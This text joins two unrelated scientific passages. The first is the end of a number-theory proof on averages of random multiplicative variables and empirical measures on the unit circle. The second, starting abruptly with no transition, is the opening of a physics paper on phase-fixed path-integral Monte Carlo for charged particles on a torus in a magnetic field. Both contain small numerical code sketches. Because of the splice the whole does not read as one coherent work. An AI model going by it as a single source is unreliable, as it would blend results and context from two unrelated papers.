$$I_{N',N, \lambda} = (1+i\lambda) \int_{N'}^{N} \frac{dx}{x^{1 + i \lambda} \log x} =
(1+i\lambda) \int_{\lambda \log N'}^{ \lambda \log N}
\frac{e^{-i y}}{y} dy.
$$
Now, for all $a \geq 1$,
$$\int_{a}^{\infty} \frac{e^{-i y}}{y} dy = \left[ \frac{e^{-i y}}{-iy} \right]_a^{\infty}
- \int_{a}^{\infty} \frac{e^{-i y}}{iy^2} dy = O(1/a),$$
which gives
$$I_{N',N, \lambda}
= \int_{\lambda \log N'}^{ \lambda \log N}
\frac{e^{-i y}}{y} dy
+ O(1/\log N').$$
Now, the integral of $(\sin y)/y$ on $\mathbb{R}_+$ is conditionally convergent, hence its integrals over arbitrary intervals are uniformly bounded, which implies
$$\Im(I_{N',N,\lambda}) = O(1).$$
We deduce
$$\Im \left(\sum_{ p \in \mathcal{P},
N' < p \leq N} p^{-1-i\lambda} \right)
= O_A \left( 1 + \frac{\lambda}{\log^A N'} \right).$$
Bounding the sum on primes smaller than $N'$ by taking the absolute value, we get:
$$\left|\Im \left(\sum_{ p \in \mathcal{P},
p \leq N}
p^{-1-i\lambda} \right) \right|
\leq \log \log (3+N') + O_A \left( 1 + \frac{\lambda}{\log^A N'} \right),$$
and then by taking $N' = e^{(\log N)^{10/A}}$, for $N$ large enough depending on $A$,
$$\left| \Im \left(\sum_{ p \in \mathcal{P},
p \leq N}
p^{-1-i\lambda} \right) \right|
\leq \frac{ 10\log \log N}{A} + O_A \left( 1 + \frac{\lambda}{\log^{10} N} \right),
$$
$$\underset{N \rightarrow \infty}{\lim \sup} \sup_{0 < \lambda \leq \log^{10} N}
(\log \log N)^{-1} \left|\Im \left(\sum_{ p \in \mathcal{P},
p \leq N}
p^{-1-i\lambda} \right) \right|
\leq 10/A,$$
and then by letting $A \rightarrow \infty$ and using the symmetry of the imaginary part for $\lambda \mapsto -\lambda$,
$$ \sup_{|\lambda| \leq \log^{10} N} \left|\Im \left(\sum_{ p \in \mathcal{P},
p \leq N}
p^{-1-i\lambda} \right) \right|
= o(\log \log N)$$
for $N \rightarrow \infty$.
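This uniform smallness of the imaginary part can be illustrated numerically; the sketch below (our own illustration, not part of the argument) compares $\Im \sum_{p \leq N} p^{-1-i\lambda} = -\sum_{p \leq N} \sin(\lambda \log p)/p$ with the trivial bound $\sum_{p \leq N} 1/p$ for a few values of $\lambda$:

```python
import math

N = 100000
sieve = bytearray([1]) * (N + 1)
sieve[0] = sieve[1] = 0
for i in range(2, int(N ** 0.5) + 1):
    if sieve[i]:
        sieve[i * i :: i] = bytearray(len(sieve[i * i :: i]))
primes = [p for p in range(2, N + 1) if sieve[p]]

trivial = sum(1.0 / p for p in primes)  # ~ log log N + M, about 2.7 here
for lam in (0.5, 1.0, 2.0, 5.0):
    # Im(p^{-i lam}) = -sin(lam * log p); the imaginary part stays O(1)
    # in practice, while the trivial bound grows like log log N
    im_part = sum(-math.sin(lam * math.log(p)) / p for p in primes)
    assert abs(im_part) < trivial
```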
Now, for all $\rho$ whose real part
is in $[-1,1)$, we have
\begin{align*}\min_{|\lambda| \leq \log^{10} N} \sum_{p \in \mathcal{P}, p \leq N}
\frac{1 - \Re(\rho \, p^{-i \lambda})}{p}
& \geq
\min_{|\lambda| \leq \log^{10} N} \sum_{p \in \mathcal{P}, p \leq N}
\frac{1 - \Re(\rho) \Re( p^{-i \lambda})}{p}
\\ & - \max_{|\lambda| \leq \log^{10} N} \left| \sum_{p \in \mathcal{P}, p \leq N}
\frac{\Im(\rho) \Im( p^{-i \lambda})}{p} \right|.
\end{align*}
The first term is at least the sum over $p \leq N$ of
$[1 - \Re(\rho)]/p$, and then at least $[1 - \Re(\rho) + o(1)] \log \log N$. The second term is $o(\log \log N)$ by the previous discussion. Hence,
\begin{equation}\min_{|\lambda| \leq \log^{10} N} \sum_{p \in \mathcal{P}, p \leq N}
\frac{1 - \Re(\rho \, p^{-i \lambda})}{p} \geq [1 - \Re(\rho) + o(1)] \log \log N. \label{eqrho}
\end{equation}
In fact, we have equality, as we check by taking $\lambda = 0$.
Now, let $\rho := \mathbb{E}[Y_2]$, and
$Z_{p,\lambda} := \Re[(Y_p - \rho)
p^{-i\lambda}]$. The variables
$(Z_{p,\lambda})_{p \in \mathcal{P}}$ are centered, independent,
and bounded by $2$. By Hoeffding's lemma,
for all $u \geq 0$,
$$\mathbb{E}[e^{u Z_{p,\lambda}/p}]
\leq e^{2(u/p)^2},$$
and then by independence,
$$\mathbb{E}[e^{u \sum_{p \in \mathcal{P}, p \leq N} Z_{p,\lambda}/p}] \leq e^{2u^2 \sum_{p \in \mathcal{P}, p \leq N} p^{-2}} \leq e^{2u^2 (\pi^2/6)} \leq e^{4u^2},$$
and then, by the exponential Markov inequality applied with $u = \frac{1}{8}(\log \log N)^{3/4}$,
\begin{align*} \mathbb{P} \left[
\sum_{p \in \mathcal{P}, p \leq N} \frac{Z_{p,\lambda}}{p}
\geq (\log \log N)^{3/4} \right]
& \leq e^{-(\log \log N)^{3/2} / 8}
\mathbb{E} \left[ e^{(1/8)(\log \log N)^{3/4} \sum_{p \in \mathcal{P}, p \leq N} \frac{Z_{p,\lambda}}{p} } \right]
\\ & \leq e^{-(\log \log N)^{3/2} / 8}
e^{4 [(1/8)(\log \log N)^{3/4}]^2}
= e^{- (\log \log N)^{3/2} / 16}.
\end{align*}
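Hoeffding's lemma can be sanity-checked numerically. In the sketch below (our illustration only) we take $Z$ uniform on $[-2,2]$, a centered variable bounded by $2$ whose moment generating function $\sinh(2u)/(2u)$ is known in closed form, and compare it with the bound $e^{2u^2}$ on a grid of $u$:

```python
import numpy as np

# Z uniform on [-2, 2] is centered and bounded by 2, so Hoeffding's
# lemma gives E[exp(u Z)] <= exp(u^2 (b - a)^2 / 8) = exp(2 u^2).
u = np.linspace(1e-6, 3.0, 200)
mgf = np.sinh(2.0 * u) / (2.0 * u)   # exact E[exp(u Z)] for this Z
bound = np.exp(2.0 * u**2)
print(np.all(mgf <= bound))          # True
```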
Applying the same inequality to $-Z_{p, \lambda}$, we deduce
$$\mathbb{P} \left[ \left|
\sum_{p \in \mathcal{P}, p \leq N} \frac{\Re[(Y_p- \rho)p^{-i\lambda}] }{p} \right|
\geq (\log \log N)^{3/4} \right]
\leq 2 e^{- (\log \log N)^{3/2} / 16},$$
$$\mathbb{P} \left[ \max_{|\lambda| \leq
\log^{10} N, \lambda \in (\log^{-1} N) \mathbb{Z} } \left|
\sum_{p \in \mathcal{P}, p \leq N} \frac{\Re[(Y_p- \rho)p^{-i\lambda}] }{p} \right|
\geq (\log \log N)^{3/4} \right]
= O\left( \log^{11}N \, e^{- (\log \log N)^{3/2} /16} \right).$$
The derivative of the last sum over $p$ with respect to $\lambda$ is dominated by
$$ \sum_{p \in \mathcal{P}, p \leq N}
\frac{\log p}{p} = O(\log N)$$
and so the sum cannot vary by more than
$O(1)$ when $\lambda$ runs between two consecutive multiples of $\log^{-1} N$.
Hence,
\begin{align*}
\mathbb{P} \left[ \max_{|\lambda| \leq
\log^{10} N} \left|
\sum_{p \in \mathcal{P}, p \leq N} \frac{\Re[(Y_p- \rho)p^{-i\lambda}] }{p} \right|
\geq (\log \log N)^{3/4} + O(1) \right]
& = O \left( (\log N)^{11 - \sqrt{\log \log N}/16} \right)
\\& = O(\log^{-10} N).
\end{align*}
If we define, for $k \geq 1$, $N_k$ as the integer part of $e^{k^{1/5}}$, we deduce, by the Borel--Cantelli lemma, that almost surely, for all but finitely many $k \geq 1$,
$$\max_{|\lambda| \leq
\log^{10} N_k} \left|
\sum_{p \in \mathcal{P}, p \leq N_k} \frac{\Re[(Y_p- \rho)p^{-i\lambda}] }{p} \right| \leq (\log \log N_k)^{3/4} + O(1).$$
If this event occurs, we deduce, using \eqref{eqrho},
$$\min_{|\lambda| \leq \log^{10} N_k} \sum_{p \in \mathcal{P}, p \leq N_k}
\frac{1 - \Re(Y_p \, p^{-i \lambda})}{p} \geq [1 - \Re(\rho) + o(1)] \log \log N_k.$$
Then, by Proposition \ref{HMT}, we get
$$\left|\frac{1}{N_k}
\sum_{n=1}^{N_k} Y_n \right|
\leq C \left[ \left( 1 +
[1 - \Re(\rho) + o(1)] \log \log N_k
\right) (\log N_k)^{-(1 - \Re(\rho)) + o(1)} + \sqrt{2} \, \log^{-5} N_k \right].$$
Since $- (1 - \Re(\rho)) \geq -2 > -5$, we deduce
$$\left|\frac{1}{N_k}
\sum_{n=1}^{N_k} Y_n \right| =
O((\log N_k)^{-(1 - \Re(\rho)) + o(1)}),$$
which gives the claimed result along the sequence $(N_k)_{k \geq 1}$.
Now, if $N \in [N_k, N_{k+1}]$, we have, since all the $Y_n$'s have modulus at most $1$,
\begin{align*}
\left|\frac{1}{N_k}
\sum_{n=1}^{N_k} Y_n
- \frac{1}{N} \sum_{n=1}^{N} Y_n
\right|
& \leq
\left| \frac{1}{N} \sum_{n=N_k+1}^N Y_n
\right| + \left( \frac{1}{N_k} - \frac{1}{N} \right) \left|\sum_{n=1}^{N_k} Y_n \right|
\leq \frac{N - N_k}{N} + N_k \left(\frac{1}{N_k} - \frac{1}{N} \right)
\\ & = \frac{2(N - N_k)}{N}
\leq \frac{2 (e^{(k+1)^{1/5}} - e^{k^{1/5}} + 1)}{e^{k^{1/5}} - 1}
= O \left(e^{(k+1)^{1/5} - k^{1/5}} - 1 + e^{-k^{1/5}} \right)
\\ & = O( k^{-4/5} ) = O(\log^{-4} N).
\end{align*}
This allows us to remove the restriction to the sequence $(N_k)_{k \geq 1}$.
\end{proof}
Using the Fourier transform, we deduce a law of large numbers for the empirical measure $\mu_{N} = \frac{1}{N} \sum_{n=1}^N \delta_{X_n}$, under the assumptions of this section.
\begin{proposition}
If for all integers $q \geq 1$, $\mathbb{P} [X_2 \in \mathbb{U}_q] < 1$, then almost surely, $\mu_N$ tends to the uniform measure on the unit circle.
\end{proposition}
\begin{proof}
For all $m \neq 0$, $X_2^m$ takes its values on the unit circle, and it is not a.s. equal to $1$. Applying the previous proposition to $Y_n = X_n^m$, we deduce that $\hat{\mu}_N(m)$ tends to zero almost surely, which gives the desired result.
\end{proof}
\begin{proposition}
If for $q \geq 2$, $X_2 \in \mathbb{U}_q$ almost surely, but $\mathbb{P} [X_2 \in \mathbb{U}_r] < 1$ for all strict divisors $r$ of $q$, then almost surely, $\mu_N$ tends to the uniform measure on $\mathbb{U}_q$. More precisely, almost surely, for all $t \in \mathbb{U}_q$, the proportion of $n \leq N$ such that $X_n = t$ is $q^{-1} + O((\log N)^{-c})$, as soon as
$$c < \inf_{1 \leq m \leq q-1}
\left(1 - \mathbb{E}[\Re(X_2^m)] \right),$$
this infimum being strictly positive.
\end{proposition}
\begin{proof}
The infimum is strictly positive since by assumption, $\mathbb{P}[X_2^m = 1] < 1$ for all $m \in \{1, \dots, q-1\}$.
Now, we apply the previous result to $Y_n = X_n^m$ for all $m \in \{1, \dots, q-1\}$, and we get the claim after doing a discrete Fourier inversion.
\end{proof}
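The discrete Fourier inversion in the last step is easy to make concrete. In the toy computation below (the multiplicities are arbitrary choices of ours), the identity $\frac{1}{q}\sum_{m=0}^{q-1} t^{-m}\hat\mu_N(m) = \frac{1}{N}\#\{n \leq N : X_n = t\}$ holds exactly for any finite sample on $\mathbb{U}_q$:

```python
import numpy as np

q = 5
roots = np.exp(2j * np.pi * np.arange(q) / q)   # the elements of U_q
counts = np.array([10, 3, 7, 0, 5])             # toy multiplicities
X = np.repeat(roots, counts)
N = len(X)

# empirical Fourier modes hat{mu}_N(m) = (1/N) sum_n X_n^m
mu_hat = np.array([np.mean(X**m) for m in range(q)])

# discrete Fourier inversion recovers the proportion of each t in U_q
props = np.array([np.mean([roots[j]**(-m) * mu_hat[m] for m in range(q)]).real
                  for j in range(q)])
print(np.allclose(props, counts / N))           # True
```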
The path-integral Monte Carlo (PIMC) method \cite{Ceperley95} lets us simulate many-body systems at finite temperature
in a controlled manner.
Equilibrium properties are obtained from the many-body density matrix
\begin{equation}
\label{eq:dm}
\rho(R,R';\beta) = \sum_{n}e^{-\beta\epsilon_n}\Psi_n(R)\Psi^\ast_n(R'),
\end{equation}
where $R\equiv(\mathbf r_1,\mathbf r_2,\dots,\mathbf r_N)$ collects $dN$ particle coordinates,
$d$ is the dimensionality of the system, $N$ is the number of particles,
$\{\Psi_n\}$ is a complete set of many-body eigenstates, and $\{\epsilon_n\}$ are the corresponding energies.
The convolution identity of the density matrix,
\begin{equation}
\label{eq:conv}
\rho(R,R';\beta_1+\beta_2) = \int dR'' \rho(R,R'';\beta_1)\rho(R'',R';\beta_2),
\end{equation}
is applied iteratively to yield the imaginary-time path-integral representation
\begin{multline}
\label{eq:pathint}
\rho(R,R';\beta) = \int dR_1\cdots\int dR_{M-1} \rho(R,R_1;\tau)\\
\times\rho(R_1,R_2;\tau)\dots\rho(R_{M-1},R';\tau).
\end{multline}
Here, the time-step $\tau\equiv\beta/M$ corresponds to a much higher temperature than the system temperature.
The high-temperature density matrix that connects adjacent slices,
$\rho(R_{m-1},R_m;\tau)$, can be approximated by several plausible schemes \cite{Ceperley95}.
Estimators of physical quantities are defined by integrals that involve $\rho(R,R';\beta)$;
in most cases the diagonal element $\rho(R,R;\beta)$ is sufficient.
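The factorization in Eq.~(\ref{eq:pathint}) can be exercised on a solvable example. The sketch below is our own toy, not part of the method described here: a one-dimensional harmonic oscillator with $\hbar=m=\omega=1$, the primitive approximation for the high-temperature factors, and the intermediate integrals replaced by matrix products on a grid; it recovers the exact $Z=1/(2\sinh(\beta/2))$ to a few parts in $10^3$:

```python
import numpy as np

beta, M = 2.0, 64                    # inverse temperature, number of slices
tau = beta / M
x = np.linspace(-6.0, 6.0, 301)
h = x[1] - x[0]

# primitive approximation to rho(x, x'; tau) for V(x) = x^2 / 2
free = np.exp(-(x[:, None] - x[None, :])**2 / (2.0 * tau)) / np.sqrt(2.0 * np.pi * tau)
V = 0.5 * x**2
rho_tau = free * np.exp(-0.5 * tau * (V[:, None] + V[None, :]))

# compose the M high-temperature factors as in the path-integral
# representation and take the trace
K = rho_tau * h
Z = np.trace(np.linalg.matrix_power(K, M))
Z_exact = 1.0 / (2.0 * np.sinh(0.5 * beta))
print(Z, Z_exact)
```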
The Metropolis-Hastings Monte Carlo method \cite{Metropolis53,Hastings70} is applicable to path integration
if the product of high-temperature density matrices in Eq.~(\ref{eq:pathint})
can be interpreted as a probability density function.
For time-reversal invariant bosonic systems this always holds,
and PIMC is an unbiased and essentially exact method in this case.
For fermions, however, the notorious sign problem arises, because the contribution of a particular path
can have either sign due to the presence of nondiagonal factors $\rho(R_{m-1},R_m;\tau)$
in the integrand of estimators.
The generic means to overcome this problem,
the use of restricted or constrained paths that avoid the nodal surfaces of a preconceived
trial many-body density matrix \cite{Ceperley91,Ceperley96}, makes PIMC variational in character.
On the other hand, if time-reversal is not a symmetry of the system,
either because charged particles are exposed to an external magnetic field or the system is rotated,
the density matrices are complex-valued in general
and hence the prescription of the nodal surfaces is insufficient.
A consistent method would be to sample paths from the probability density function (PDF)
$\prod_{m=1}^{M}|\rho(R_{m-1},R_m;\tau)|$ (here we assume integration with the diagonal
density matrix as the kernel of the estimator, and define $R=R'\equiv R_0=R_M$),
and sum them up with the complex phase factor $\prod_{m=1}^{M}\frac{\rho(R_{m-1},R_m;\tau)}{|\rho(R_{m-1},R_m;\tau)|}$.
This procedure would result in a more severe form of the sign problem: contributions with different
phase factors would cancel almost completely.
This issue is equally severe for bosons and fermions, and arises even
in the nonphysical case of distinguishable particles (``bolzmannons'').
In analogy to the phase-fixing extension \cite{Ortiz93,Bolton96} of zero-temperature
methods such as diffusion quantum Monte Carlo \cite{Foulkes01},
phase fixing is an obvious route to adapt PIMC to such problems.
Unlike the case of zero-temperature methods, the function whose phase needs to be fixed
is the many-body density matrix in Eq.~(\ref{eq:dm}), not a wave function.
While the fixed-phase extension of the PIMC method is often mentioned in the literature \cite{Akkineni08},
it is hardly ever applied, in contrast to the similar extension of zero-temperature methods
\cite{Ortiz93,Melik-Alaverdian95,Bolton96,Melik-Alaverdian97}.
We address several issues related to the use of PIMC in time-reversal non-invariant bulk systems.
(Finite systems such as quantum dots are not our primary interest here.)
First, if we want to simulate bulk systems consequently, we have to use periodic boundary conditions,
possibly with twist angles that let us reduce finite-size effects such as shell effects
in finite-size representations of Fermi liquids \cite{Lin01}, which have analogs in strongly
correlated electron systems in magnetic fields \cite{Shao15}.
One should base any PIMC simulation on the single-particle thermal density matrix (equivalently, kinetic action)
that is exact under the chosen boundary conditions.
We show that the free propagation of a charged particle (equivalently, the thermal density matrix)
on a flat torus subjected to a perpendicular magnetic field already exhibits a rather rich structure,
although these patterns lose their significance for small imaginary times or large system sizes.
We provide several closed-form expressions utilizing Jacobi elliptic functions for such a propagator in Sec.~\ref{sec:freedm},
with a detailed derivation delegated to the Appendix.
This result lets us define the kinetic action in a way that is compatible with the torus.
The PIMC method is applicable beyond toy models only because the sampling of paths could be made efficient
by the introduction of multi-slice moves.
These replace entire segments of the path \cite{Pollock84}
according to the PDF $\prod_{m=1}^{M}\rho(R_{m-1},R_m;\tau)$.
If, however, the density matrix is complex-valued and the probability density of paths
is determined by its magnitude, the familiar bisection method \cite{Ceperley95}
that relies on the L\'evy construction of a Brownian bridge, runs into difficulties
because the convolution property in Eq.~(\ref{eq:conv}) is not applicable to magnitudes.
In Sec.~\ref{multislice} we elaborate a nonrecursive variant of the multi-slice move algorithm
that is efficient in the presence of a magnetic field.
As a by-product, we also present an adaptation of the bisection method under periodic boundary conditions
for time-reversal-invariant systems.
Finally, we demonstrate the use of phase-fixed PIMC for bulk systems
in a case study of rotating two-dimensional Yukawa gases.
Yukawa bosons arise either in type-II superconductors, where the Abrikosov vortex
lines interact by a repulsive modified-Bessel-function potential $\propto K_0(r)$ \cite{Nelson89,Magro93,Nordborg97},
or in strongly interacting Fermi-Fermi mixtures of ultracold atoms, if the mass ratio of the
two species, $M/m$, is very far from unity and the motion of both species is confined to two dimensions \cite{Petrov07}.
A flux density can be introduced to cold atomic systems by rotating the gas, a technique that has been applied frequently
in the last two decades \cite{Madison00,AboShaeer01,Hodby01,Haljan01}.
In the model we consider particles that interact via a modified-Bessel-function potential $\propto K_0(r)$.
This is a good approximation also to the inter-atomic interaction in a Fermi-Fermi mixture at sufficiently
long range \cite{Petrov07}.
We do not claim, however, to represent either problem faithfully:
we do not include the nonuniversal short-range repulsion between Fermi-Fermi bound states,
and the inclusion of additional flux density would be difficult to justify for Abrikosov vortices.
We have deliberately chosen this system for computational convenience in order to demonstrate the adequacy of our methodology.
On the one hand, $K_0(r)$ is mildly divergent at short range, thus even the simplest approximation
to the high-temperature density matrix, the primitive action, is a reasonable starting point.
On the other, as $K_0(r)$ decays exponentially at large range, the intricacies of Ewald summation can be avoided.
As a first approach, we use the density matrix of the free Bose and Fermi gases to
fix the phase of the many-body density matrix.
We are encouraged in this by the fact that in the case of the node fixing problem,
which arises analogously for time-reversal invariant fermionic systems, significant
progress was possible both for $^3$He \cite{Ceperley92} and the hydrogen plasma \cite{Pierleoni94,Magro96}
using the nodal surfaces of either the noninteracting system or some well-tested variational ground state wave function.
(The two approaches are somewhat complementary.)
Simple as it is, we demonstrate that phase-fixed PIMC captures the crystallization
of rotating Yukawa bosons and fermions as a function of interaction strength, flux density, and temperature.
We emphasize that, unlike for the diffusion Monte Carlo or Green's function Monte Carlo methods,
no trial wave function of the proper symmetry serves as input to such a calculation;
but we do choose the aspect ratio of the unit cell so that
it can accommodate a finite piece of a triangular lattice.
The paper is structured as follows.
In Sec.~\ref{sec:freedm} we present the density matrix for a single particle in a magnetic field
on the torus, with some mathematical details of the derivation delegated to Appendix \ref{app:dm},
and the considerations of its efficient computation to Appendix \ref{app:comput}.
The adaptation of the multi-slice sampling algorithm is discussed in Sec.~\ref{multislice}.
Sec.~\ref{yukawa} presents a case study, where the phase-fixed path-integral Monte Carlo method
is applied to rotating systems of two-dimensional Yukawa gases under periodic boundary conditions.
In Sec.~\ref{conclusion} we summarize our results and discuss further research directions.
Appendix \ref{app:pfaction} presents the technical details of the phase-fixing methodology for PIMC.
\section{The thermal density matrix}
\label{sec:freedm}
We consider a flat torus pierced by a perpendicular magnetic field.
Consider the parallelogram spanned by two nonparallel vectors $\mathbf L_1=(L_1,0)$ and
$\mathbf L_2=(L_2\cos\theta,L_2\sin\theta)$.
A torus is obtained by identifying the opposite sides of this unit cell, cf.\ Fig.~\ref{fig:domain}(a).
\begin{figure}[htbp]
\begin{center}
\includegraphics[width=.49\columnwidth]{basecell}
\includegraphics[width=.49\columnwidth]{quadruplecell}
\end{center}
\caption{\label{fig:domain}
(a) The principal domain of the torus.
We also depict $\mathbf L_1$, $\mathbf L_2$ and $\theta$ as defined in the text;
we identify the plane with the complex plane, and indicate the corners of the
principal domain using the complex parameter $\tau$ defined in Eq.~(\ref{eq:deftau}).
(b) The quadruple domain used for finding the zeros of the density matrix in the low-temperature limit.
}
\end{figure}
We will refer to a similar parallelogram that has the origin as its center as the principal domain.
We use the Landau gauge $\mathbf A = -By\mathbf{\hat x}$ throughout this article.
Electrons are characterized by complex coordinates $z=x+iy$,
and we define
\begin{equation}
\label{eq:deftau}
\tau=\frac{L_2}{L_1}e^{i\theta},
\end{equation}
so that $L_1$ and $L_1\tau$ span the parallelogram on the complex plane.
In the presence of a perpendicular magnetic field, magnetic translations \cite{Zak64} are useful:
\begin{equation}
\label{eq:translation}
t(\mathbf L)=\exp\left(\frac{i}{\hbar}\mathbf L\cdot\mathbf p-i\frac{\mathbf{\hat z}\cdot(\mathbf L\times\mathbf r)}{\ell^2}
\right),
\end{equation}
where $\mathbf p=\frac{\hbar}{i}\nabla - e\mathbf A$.
In the current gauge, these act as $t(\mathbf L)\psi(\mathbf r) =
\exp(\frac{ix\mathbf{\hat y}\cdot\mathbf L}{\ell^2})\psi(\mathbf r+\mathbf L)$.
We will require each state and the implied density matrix to obey twisted boundary conditions
with twist angles $\phi_{1,2}$,
\begin{equation}
\label{eq:twisted}
t(\mathbf L_{1,2})\psi(\mathbf r)=e^{i\phi_{1,2}}\psi(\mathbf r).
\end{equation}
The two conditions are mutually compatible only if the parallelogram is pierced by an integral number of flux quanta,
\begin{equation}
N_\phi=\frac{\left|\mathbf L_1\times\mathbf L_2\right|}{2\pi\ell^2}
=\frac{L_1 L_2\sin\theta}{2\pi\ell^2}.
\end{equation}
Then the principal domain is also a magnetic unit cell.
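The integrality of $N_\phi$ can be checked in one line from the gauge-fixed action of $t(\mathbf L)$ given above (this is just a restatement of the standard magnetic-translation algebra \cite{Zak64}): a direct computation gives
\begin{equation*}
t(\mathbf L_1)\,t(\mathbf L_2)
= e^{i\,\mathbf{\hat z}\cdot(\mathbf L_1\times\mathbf L_2)/\ell^2}\,
t(\mathbf L_2)\,t(\mathbf L_1)
= e^{2\pi iN_\phi}\,t(\mathbf L_2)\,t(\mathbf L_1),
\end{equation*}
so the two eigenvalue conditions in Eq.~(\ref{eq:twisted}) can be imposed simultaneously precisely when $e^{2\pi iN_\phi}=1$, i.e., when $N_\phi$ is an integer.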
If $N_\phi\Re\tau=k$ is an integer, i.e.,
\begin{equation}
\label{eq:restriction}
L_2\cos\theta=\frac{kL_1}{N_\phi},
\end{equation}
straightforward but tedious algebra yields the single-particle density matrix
\begin{multline}
\label{eq:second}
\rho^\text{PBC}(\mathbf r,\mathbf r';\beta) =
\frac{1}{N_\phi}\rho^\text{open}(\mathbf r,\mathbf r';\beta)\\
\times\sum_{m=0}^{N_\phi-1}\left\{
\vartheta\begin{bmatrix} 0 \\ a_m \end{bmatrix}\left(z_1\Big|\tau_1\right)
\vartheta\begin{bmatrix} 0 \\ 2b_m' \end{bmatrix}(z_2|\tau_2)+\right.\\
\left.+(-1)^k\vartheta\begin{bmatrix} 0 \\ a_m+\frac{1}{2} \end{bmatrix}\left(z_1\Big|\tau_1\right)
\vartheta\begin{bmatrix} \frac{1}{2} \\ 2b_m' \end{bmatrix}(z_2|\tau_2)
\right\},
\end{multline}
where we have factored out $\rho^\text{open}$, the density matrix for open boundary conditions:
\begin{multline}
\label{eq:openbc}
\rho^\text{open}(\mathbf r,\mathbf r';\beta)=\frac{1}{2\pi\ell^2}\frac{\sqrt u}{1-u}\\
\times\exp\left(-\frac{1+u}{1-u}\frac{\left|\mathbf r-\mathbf r'\right|^2}{4\ell^2}+\frac{i(x'-x)(y+y')}{2\ell^2}\right),
\end{multline}
where $\ell=\sqrt{\frac{\hbar}{eB}}$ is the magnetic length, $u=e^{-\beta\hbar\omega_c}$,
and $\omega_c=\frac{eB}{m}$ is the cyclotron frequency \cite{comment3}.
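For orientation we note that, with $u=e^{-\beta\hbar\omega_c}$, the $u$-dependent factors are the familiar hyperbolic ones,
\begin{equation*}
\frac{\sqrt u}{1-u} = \frac{1}{2\sinh(\beta\hbar\omega_c/2)},
\qquad
\frac{1+u}{1-u} = \coth\!\left(\frac{\beta\hbar\omega_c}{2}\right),
\end{equation*}
so Eq.~(\ref{eq:openbc}) is the standard Landau propagator written in the Landau gauge.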
Above, we have used Jacobi elliptic functions with characteristics \cite{Mumford87,comment1}
\begin{equation}
\label{eq:theta}
\vartheta\begin{bmatrix} a \\ b \end{bmatrix}(z|\tau) = \sum_ne^{i\pi\tau(n+a)^2+2i(n+a)(z+b\pi)}.
\end{equation}
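Eq.~(\ref{eq:theta}) is straightforward to evaluate by truncating the sum (the cutoff below is an arbitrary choice of ours; the terms decay like Gaussians in $n$), and the two quasi-periods $z \to z+\pi$ and $z \to z+\pi\tau$ provide convenient correctness checks:

```python
import numpy as np

def theta(a, b, z, tau, nmax=40):
    """Truncated sum for the theta function with characteristics."""
    n = np.arange(-nmax, nmax + 1)
    return np.sum(np.exp(1j * np.pi * tau * (n + a)**2
                         + 2j * (n + a) * (z + b * np.pi)))

a, b, z, tau = 0.3, 0.1, 0.25 + 0.4j, 0.2 + 1.5j
# theta(z + pi) = exp(2 pi i a) theta(z)
err1 = abs(theta(a, b, z + np.pi, tau)
           - np.exp(2j * np.pi * a) * theta(a, b, z, tau))
# theta(z + pi tau) = exp(-i pi tau - 2i (z + b pi)) theta(z)
err2 = abs(theta(a, b, z + np.pi * tau, tau)
           - np.exp(-1j * np.pi * tau - 2j * (z + b * np.pi)) * theta(a, b, z, tau))
print(err1, err2)   # both at machine-precision level
```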
The arguments in Eq.~(\ref{eq:second}) are defined as
\begin{equation}
\begin{split}
\tau_1&=\frac{i}{\pi}\left(\frac{L_1}{2\ell N_\phi}\right)^2\frac{1+u}{1-u},\\
z_1&=\frac{L_1}{4\ell^2 N_\phi}\left(y+y' + i(x'-x)\frac{1+u}{1-u}\right),\\
\tau_2&=i\pi\left(\frac{2\ell N_\phi}{L_1}\right)^2\frac{1+u}{1-u},\\
z_2&=\frac{N_\phi\pi}{L_1}\left(x+x' + i(y-y')\frac{1+u}{1-u}\right);
\end{split}
\label{eq:zdef}
\end{equation}
and the constants related to boundary conditions are
\begin{equation}
\label{eq:abdef}
\begin{split}
a_m&=\frac{\phi_1}{2\pi N_\phi} + \frac{m}{N_\phi}, \\
b_m&=-\frac{\phi_2}{2\pi} - \frac{N_\phi\Re\tau}{2}, \\
b_m'&=b_m+N_\phi a_m\Re\tau.
\end{split}
\end{equation}
The derivation of Eq.~(\ref{eq:second}) is delegated to Appendix \ref{app:dm}.
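Eq.~(\ref{eq:openbc}) can also be verified to compose correctly under the convolution identity Eq.~(\ref{eq:conv}), the property the path-integral discretization relies on. In the numerical sketch below the parameter values and the quadrature grid are arbitrary choices of ours (we set $\ell=1$ and measure imaginary time by $\theta=\beta\hbar\omega_c$):

```python
import numpy as np

def rho_open(x, y, xp, yp, theta, ell=1.0):
    """Single-particle Landau propagator for open boundary conditions."""
    u = np.exp(-theta)
    pref = np.sqrt(u) / (1.0 - u) / (2.0 * np.pi * ell**2)
    gauss = -((x - xp)**2 + (y - yp)**2) * (1.0 + u) / (1.0 - u) / (4.0 * ell**2)
    phase = (xp - x) * (y + yp) / (2.0 * ell**2)
    return pref * np.exp(gauss + 1j * phase)

# check: int d2r'' rho(r, r''; t1) rho(r'', r'; t2) = rho(r, r'; t1 + t2)
g = np.linspace(-6.0, 6.0, 241)
h = g[1] - g[0]
X, Y = np.meshgrid(g, g, indexing="ij")
x, y, xp, yp, t1, t2 = 0.3, -0.2, -0.5, 0.4, 0.4, 0.7
lhs = np.sum(rho_open(x, y, X, Y, t1) * rho_open(X, Y, xp, yp, t2)) * h * h
rhs = rho_open(x, y, xp, yp, t1 + t2)
print(abs(lhs - rhs) / abs(rhs))   # small quadrature error
```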
\begin{figure}[htbp]
\begin{center}
\includegraphics[width=0.49\columnwidth]{tempmove1}
\includegraphics[width=0.49\columnwidth]{tempmove2}
\includegraphics[width=0.49\columnwidth]{tempmove3}
\includegraphics[width=0.49\columnwidth]{tempmove4}
\end{center}
\caption{\label{fig:tempmove}
The dependence of $|\rho^\text{PBC}(\mathbf r,\mathbf r';\beta)|$ on imaginary time $\beta$.
There are $N_\phi=6$ flux quanta in the principal domain, $L_2/L_1=1.17$, $\theta\approx55^\circ$,
$\phi_1=\phi_2=0$, and we have fixed $\mathbf r'$ at the origin.
The panels correspond to $\beta\hbar\omega_c=0.3$, 0.7, 1.1, and 5, respectively.
}
\end{figure}
The behavior of the density matrix is shown in Fig.~\ref{fig:tempmove} for the
most general case, an oblique unit cell.
For small imaginary time (high temperature) $|\rho^\text{PBC}(\mathbf r,\mathbf r';\beta)|$
has a small Gaussian peak around $\mathbf r'$, which is fixed at the origin in the figure.
This peak spreads out by diffusion as $\beta$ is increased,
and eventually the Gaussians from neighboring unit cells start to overlap appreciably.
However, the density matrix also has a phase due to the external magnetic field,
which gives rise to an interference pattern in this time range.
There is destructive interference at certain points, which effectively arrest the diffusion.
